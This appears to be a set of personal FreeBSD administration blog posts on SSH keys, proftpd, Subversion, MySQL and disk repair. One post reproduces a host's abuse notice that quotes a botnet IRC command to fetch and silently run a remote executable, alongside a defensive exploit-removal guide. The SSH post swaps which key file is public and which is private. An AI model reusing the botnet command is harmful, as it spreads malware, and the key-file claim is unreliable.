First step, on the client do the following:

mkdir -p ~/.ssh
chmod 700 ~/.ssh
ssh-keygen -t rsa


Have it use the default location (~/.ssh/id_rsa), and make sure there is no passkey. This creates a file containing the public key (id_rsa) and a file containing the private key (id_rsa.pub).

There should be one line of text in id_rsa.pub. Copy it to the server, putting it in ~/.ssh/authorized_keys2. Then execute this command:

chmod 600 authorized_keys2


That’s it! Now connection from the client to the server with this command

ssh server


If that doesn’t work (i.e. it prompts for your password), you may have to try a few things. On one box that I tried, it worked as above. On another, I had to do the following.

ssh -i ~/.ssh/id_rsa server


If that works, add or create the file and insert these two lines to ~/.ssh/config

Host server
{tab}IdentityFile ~/.ssh/id_rsa


If you SSH as much as I do, this can save lots of time.

That 10-20 second delay was caused by a DNS lookup, whether failed or succeeded I had no need for it. Truthfully in my /var/log/xferlog I’d rather see
24.20.96.1XX rather than
c-24-20-96-1XX.hsd1.wa.comcast.net

So to fix it, I added these lines to my /usr/local/etc/proftpd.conf:

#to enable faster logins
UseReverseDNS off
IdentLookups off

Then restarted the server


root@sam# /usr/local/etc/rc.d/proftpd.sh restart
Stopping proftpd.
Waiting for PIDS: 577.
Starting proftpd.
root@sam#

And wha-la, instead of it taking 20+ seconds to connect and authenticate with my server, it’s done within 3 seconds.

Read from remote host raybdbomb.com: Connection reset by peer

I messed around with the sshd config a bit and wasn’t able to get it to go away. I’m pretty sure that the connection is being closed by some firewall in the interim. So for a solution, I installed spinner.


cd /usr/ports/sysutils/spinner/
make install clean
spinner


It puts a character on the top left of the console, which keeps the session alive with minimal amounts of data transfer.

Works great!

First, install subversion from the ports

[root@sam ~]# cd /usr/ports/devel/subversion
[root@sam /usr/ports/devel/subversion]# make install clean

Next, add a user for the subversion server to run under. I made mine “svn” at “/home/svn”. And I made a directory for the repository “/home/svn/rep”.

Next, setup your /etc/rc.conf so that the svn server will start on boot, or start at all. Append this to /etc/rc.conf

#svn server
svnserve_enable="YES"
#svnserve_flags="-d --listen-port=3690 --listen-host=0.0.0.0"
svnserve_flags="-d -r /home/svn/rep --listen-host=0.0.0.0"
svnserve_data="/home/svn/rep"
svnserve_user="svn"
svnserve_group="svn"

Start your svn server

[root@sam ~]# /usr/local/etc/rc.d/svnserve.sh start

Create the repository with svn

[root@sam ~]# svnadmin create /home/svn/rep

Explicitly set the password file, edit {repository}/conf/svnserve.conf and uncomment the line

password-db = passwd

and do whatever other edits to fine tune your repository.

Edit the password file to your liking, setting up a user with write access. The password file is {repository}/conf/passwd

And wha-la, presto

Subject: Policy Enforcement of LTSV-## at {my IP} for IRC Malicious

NOTES: Remove the IRCd software from this server. It is being used for malicious intent.
QUOTE FROM THE
Axxx has changed the topic on channel #lucky to “.dl http://(url)/a.goud5/install.exe a.exe 1 -s”
.l ………. -s
.q

NOTES: I have added an Exploit Removal Guide below my signature block. This will help search for commonw exploits.

Dear Client,

This is a Policy Enforcement Notice that your server has violated our Acceptable Use Policy available at http://www.layeredtech.com/aup.shtml. Please refer to the attached complaints and/or logs of abuse. If you believe we have traced this issue to you erroneously, our staff will investigate the issue further.

IT IS YOUR RESPONSIBILITY TO REMOVE ALL DOMAINS, USERS, AND CONTENT CAUSING THIS ABUSE ISSUE AND TO INVESTIGATE ANY MISCONFIGURED, INFECTED, OR UNAUTHORIZED USE OF SOFTWARE.

PENDING YOUR REQUIRED REPLY WITH YOUR COMMENTS, QUESTIONS, OR ACTIONS TO RESOLVE THIS ISSUE, THE SERVER IS:

[] Monitored for Additional Violations
[] Accessed for Investigation, Cleaning, Hardening, or Securing
[x] Disconnected in: [] 24-Hours [x] 12-Hours [] 6-Hours [] 1-Hour [] 0-Hours
[] Required Reload Request with: [] New Client Required [] No Data Recovery [] Data Recovery Allowed
at http://support.layeredtech.com under “Open a Ticket”
[] Hard Drives Seized for Investigation
[] Null-Routed
[] Port Shutdown
[] On 30-Day Probation
[] Reviewed for Possible Cancellation
[] Cancelled

FOR THE FOLLOWING REASONS:

[] Child Porn C Hosting, Distributing, or Linking to Pornography Involving a Person Under Legal Age
[] Copyright L Hosting, Distributing, or Linking to Copyright Infringed Materials
[] Cracking H Brute Force Access of Secured Network Devices
[] DoS H Denial of Service Attack of Network Devices
[] Forgery M Faking an IP Address, Hostname, E-Mail Address, or Header
[] Fraud Site H Hosting or Linking to a Website Intended to Deceive the Public
[] Hacking H Circumventing Security Systems of Network Devices
[] HYIP Site M Hosting or Linking to a Website of High Yield Investment Program, Ponzi Scheme, or Pyramid Scheme
[] ID Theft H Hosting, Distributing, or Linking to Stolen Account Identification Information
[] Infection H Hosting, Distributing, or Linking to Exploits, Trojans, Viruses, or Worms
[x] IRC Malicious M Malicious Use of Internet Relay Chat
[] IRC Unregistered L Internet Relay Chat Server not Registerd with Layered Technologies
[] Phishing H Identity Theft by Email Under False Pretense
[] ROKSO Spamhaus C ROKSO Blacklisting of an IP at www.spamhaus.org for Malicious Activity
[] Scanning H Probing for Vulnerabilities of Network Devices
[] Shells H Hosting Accounts Primarily for Shell Access
[] Spam Cannon E Sending High Volume Spam (UCE or UBE)
[] Spam Email L Unsolicited Commercial Email (UCE) or Unsolicited Bulk Email (UBE)
[] Spam List M Hosting, Distributing, or Linking to Email Address Lists for Spam
[] Spam Proxy C Hosting an Open Proxy Server Used for Spam
[] Spam Relay C Hosting an Open Mail Rely Used for Spam
[] Spam Hijack C Distributing Spam Through a Third Party Server Vulnerability
[] Spam Site L A Site Advertised by Spam Email or Spam Web
[] Spam Ware H Hosting, Distributing, or Linking to Software Designed for Spamming
[] Spam Web L Unsolicited, Bulk, or Forged Site Advertisement in Web Logs, Forums, or Guestbooks
[] Terrorist Site C Hosting or Linking to a Site Advocating Terrorism
[] Toolz L Hosting, Distributing, or Linking to Cracking, DoS, Forgery, Infection, or Scanning Software or Instruction
[] Trademark L Hosting, Distributing, or Linking to Trade Mark Infringed Materials
[] Warez L Hosting, Distributing, or Linking to Crackz, Hackz, KeyGenz, Serialz, or Pirated Software

[] OTHER:

Thank you for your cooperation,

Layered Technologies Abuse Team

On Thu, 02 Mar 2006 13:01:42 -0600, pen@ev6.net wrote:

>> hello,
>>
>> recently stumbled onto a drone ircd on your network, {my IP}:8080,
>> channel #lucky.
>>
>> i was going to contact the customer directly but thier whois info
>> provides no abuse contact or any other usable contact.
>>
>> please null route this ip immediately. the bots on this server are being
>> used to DDoS a customer of ours..
>>
>>
>> thanks,
>> jl, ev6 networks.

Thank you,

Tom
Layered Technologies
Policy Enforcement Technician

ACCEPTABLE USE POLICY at http://layeredtech.com/aup.shtml

### Exploit Removal Guide ###

The following is a first step in finding and removing exploits and root kits on a Linux or BSD system.

1. EXECUTE THE FOLLOWING COMMANDS TO HELP PREVENT UPLOADS OF EXPLOITS:

chmod 0750 `which curl` 2>&-; chmod 0750 `which fetch` 2>&-; chmod 0750 `which wget` 2>&-

2. EXECUTE THE FOLLOWING COMMANDS TO CHECK FOR POSSIBLE EXISTING EXPLOITS:

sh
for x in “/dev/shm /tmp /usr/local/apache/proxy /var/spool /var/tmp”; do ls -loAFR $x 2>&- | grep -E “^$|^/| apache | nobody | unknown | www | web ” | grep -E “^$|^/|/$|\*$|\.pl$” | tee exploits.txt; done; echo -e “\n\nPossible Exploit Files and Directories: `grep -Ev “^$|^/” exploits.txt | wc -l | tr -d ‘ ‘`” | tee -a exploits.txt
exit

Lines ending with an asterisk ‘*’, ‘.pl’, or a slash ‘/’ are possible exploit files or directories which should be investigated and removed followed by rebooting the server to kill any running exploit processes. You can refer to the exploits.txt file generated by the above commands for later reference.

3. You should also install and run the progam called rkhunter.

Rootkit Hunter is scanning tool to ensure you for about 99.9% you’re clean of nasty tools.

This tool scans for rootkits, backdoors and local exploits by running tests like:

- MD5/SHA1 hash compare
- Look for default files used by rootkits
- Wrong file permissions for binaries
- Look for suspected strings in LKM and KLD modules
- Look for hidden files
- Optional scan within plaintext and binary files

WWW: http://www.rootkit.nl/

On BSD sytems:
cd /usr/ports/security/rkhunter; make install clean; rehash; rkhunter -c
(or for help with rkhunter arguments do: rkhunter -h)

On RedHat, Fedora, CentOS systems:
yum -y install rkhunter; rkhunter -c
(or for help with rkhunter arguments do: rkhunter -h)

If you cannot do this, our staff will clean, harden, and secure the server for you for a fee or or you can have a 3rd party company to do it.

If you cannot secure your server, you should issue a Reload Request of your system at http://support.layeredtech.com under “Open A Ticket”.

And the Rootkit Hunter didn’t find any rootkits… unfortunately. So, it’s time to do a system refresh. I sent this e-mail to the owners of the domains that I host:

Dear “clients”:

The server, nooblet.us which hosts your domain(s), files or e-mails nicely acquired a rootkit today (http://en.wikipedia.org/wiki/Rootkit). I was unable to find out what caused it, or even where it resides, so my ISP strongly recommends I do an OS reload (very soon). I will being the OS reload on Friday, March 2nd, 2006 (tomorrow), at approximately 2 p.m. PST.

I have installed lots of software on this server, so it might take me awhile to get it all caught up and reinstalled. Hopefully I can get it completed within 1 day. During this time, your mail, files, and everything else associated with your domains will not be available.
Also, it has come to my attention that too many of you have ssh access. This is essentially what caused the problem. Unless you make a deal with me to pay for some of the cost of the server, ssh access will be limited to me alone, you will instead only have ftp access to write files to the server. If you need ssh access, send me a message after I restore the server and we can negotiate a price.

The information that *will not* be lost during the server move includes:
1. Files. I have backed up all of the files for your domain and will restore it as soon as I can. My home system has a 30KB/s upload limit, so it might take awhile.
2. Domain Configuration. I have backed up the “named” files, so restoring this information should be the first to be done.

The information that *will* be lost during the server move includes:
1. E-mail accounts. This includes both the e-mails themselves and the login/password information. If you want to backup your e-mails, I’d suggest you do that as soon as possible, because it WILL be gone on Friday.
2. Username/password pair combinations. Your login will be lost. I will provide you with your username and a dummy password when the server is restored.

My e-mail {} will be down during the transition, so you can e-mail RnospamDEHLER(at)gmail.com in the meantime with questions or comments.

Sorry for the inconvenience, but really I’m just as inconvenienced as you, if not more.

Please send me your non-nooblet.us hosted e-mail to RnospamDEHLER(at)gmail.com and I can provide you with updates as they come.

Bummer, eh?

export PS1="e[32;40mt e[33;40mue[34;40m@e[31;40mh e[36;40mwne[37;40m#$ e[0m"

Then I added color to my ls’s. Once you experience the default linux coloring, going back is pretty hard.

CLICOLOR="YES";    export CLICOLOR
LSCOLORS="ExGxFxdxCxDxDxhbadExEx";    export LSCOLORS

This gives
the 24 hour time in green, followed by user (orange)@(blue)host(red), followed by the current path (light blue), then new line
followed by the number of commands done on this term thus far, followed by the “$” symbol.

Works great for me.

Of course, don’t forget to source it in your .bash_profile
source ~/.bashrc

FAILURE-READ_DMA status=51 error=40 LBA=135486975 mount = /dev/ad0s1d

Doing fsck -y /dev/ad0s1d, the check would complete without errors. But trying to mount the drive as rw would give me the following error:

mount: /dev/ad0s1d: Input/output error

I was able to mount it read-only to retrieve the data, but I really wanted to have it fixed so I could write to it again.

I tried to follow the FreeBSD handbook guide to reformatting the drive, but that did not complete, giving read/write errors.

It was suggested by cperciva@layeredtech that I

Overwrite that partition with zeroes (dd if=/dev/zero of=/dev/ad0s1d) and then newfs and mount (newfs /dev/ad0s1d && mount /dev/ad0s1d)

While that series of commands didn’t work (same input/output errors), doing effectively the same thing with the Maxtor diagnostics tool worked.

I went to Maxtor.com, and selected my model # (which seems to only work on IE…), went to Diagnostics, then downloaded PowerMax and put it on a floppy. Running a Basic Quick Test (90 Second) passed, but an Advanced Test (Full Read Scan) failed fairly early on. I was given two error codes, which are supposedly internal for Maxtor, and I guess are used for RMA processing. The codes were dea46771 and dea46761, which mean nothing to me.

So I then performed a Low Level Format (Quick) and Low Level Format (Full). This took the better part of 2 hours. After doing this, the Advanced Test completed. I was then able to format and partition the drive via the FreeBSD Handbook: Adding Disks section.

I have no doubt that the reason the hard drive was failing was the heat inside. I have two 200 GB hard drives and 1 40 GB hard drive all practically laying on top of each other in the hard drive bay. I’m just squeezing as much life as I can out of this old system. Next system, hard drive coolers, video card coolers, {insert third term to match form} coolers, Oh my!

Save the following into /usr/local/bin/ftponly, chmod it 755 and add it to /etc/shells. Then change the shell of each of the users to this, and they will be restricted from ssh “interactive” access.

#!/bin/sh
#
# ftponly shell
#
trap “/bin/echo Sorry; exit 0″ 1 2 3 4 5 6 7 10 15
#
IFS=”"
Admin=access@host.some.domain
System=`/usr/ucb/hostname`@`/usr/bin/domainname`
#
/bin/echo
/bin/echo “***********************************”
/bin/echo ” You are NOT allowed interactive access to $System.”
/bin/echo
/bin/echo ” User accounts are restricted to ftp and web access.”
/bin/echo
/bin/echo ” Direct questions concerning this policy to $Admin.”
/bin/echo “***********************************”
/bin/echo
#
# C’ya
#
exit 0

cd /usr/ports/databases/mysql41-server/
make install clean
/usr/local/bin/mysql_install_db
chown -R mysql /var/db/mysql/
chgrp -R mysql /var/db/mysql/
/usr/local/bin/mysqld_safe –user=mysql &
/usr/local/bin/mysqladmin -u root password newpassword

Edit 8/17:
{edit /etc/rc.conf and add}
mysql_enable="YES"
Thanks lucas

That works.


-su# /usr/local/etc/rc.d/proftpd.sh start
Starting proftpd.
-su# /usr/local/etc/rc.d/proftpd.sh status
proftpd is not running.


I inspected /var/log/messages, and found this message
Feb 10 15:59:42 {hostname} proftpd [4375]: {hostname} – error opening scoreboard: No such file or directory.

What you have to do is edit /usr/local/etc/proftpd.conf and add the line

ScoreboardFile /var/run/proftpd.scoreboard

then execute the command

touch /var/run/proftpd.scoreboard

to create the file. Then when you run the startup script, you will get this message

-su# /usr/local/etc/rc.d/proftpd.sh start
Starting proftpd.
-su# /usr/local/etc/rc.d/proftpd.sh status
proftpd is running as pid 4576.